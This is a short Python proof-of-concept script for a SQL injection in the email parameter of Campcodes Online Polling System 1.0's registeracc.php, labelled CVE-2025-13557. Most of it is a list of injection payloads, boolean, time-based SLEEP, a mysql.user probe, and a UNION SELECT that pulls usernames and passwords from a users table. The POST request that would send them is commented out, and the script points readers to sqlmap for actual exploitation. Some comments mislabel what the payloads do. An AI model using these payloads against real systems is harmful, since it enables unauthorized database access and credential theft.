import requests
import sys
# CVE-2025-13557 PoC - SQL Injection in Campcodes Online Polling System 1.0
# Target: /registeracc.php email parameter
# Author: Security Researcher
def exploit_sqli(target_url):
"""
SQL Injection PoC for CVE-2025-13557
This demonstrates time-based blind SQL injection in email parameter
"""
# Normal registration request (for reference)
normal_data = {
'email': '
[email protected]',
'username': 'testuser',
'password': 'testpass123'
}
# SQL Injection payloads
payloads = [
# Boolean-based injection - check if vulnerable
"
[email protected]' AND 1=1-- -",
# Database version extraction via time-based blind injection
"
[email protected]' AND SLEEP(5)-- -",
# Database name extraction (MySQL)
"
[email protected]' AND (SELECT COUNT(*) FROM mysql.user) > 0-- -",
# User table extraction
"
[email protected]' UNION SELECT NULL,NULL,username,password,NULL FROM users-- -"
]
print(f"[*] Target: {target_url}")
print(f"[*] Testing SQL Injection vulnerability...\n")
for i, payload in enumerate(payloads, 1):
print(f"[Payload {i}] {payload}")
# Simulate the request (uncomment for actual testing)
# data = normal_data.copy()
# data['email'] = payload
# try:
# response = requests.post(target_url, data=data, timeout=10)
# print(f"[Response Code] {response.status_code}")
# except requests.exceptions.RequestException as e:
# print(f"[Error] {e}")
print()
print("[*] Note: This PoC demonstrates the vulnerability structure.")
print("[*] Use sqlmap or manual testing for actual exploitation.")
if __name__ == '__main__':
if len(sys.argv) > 1:
target = sys.argv[1]
else:
target = 'http://target-site.com/registeracc.php'
exploit_sqli(target)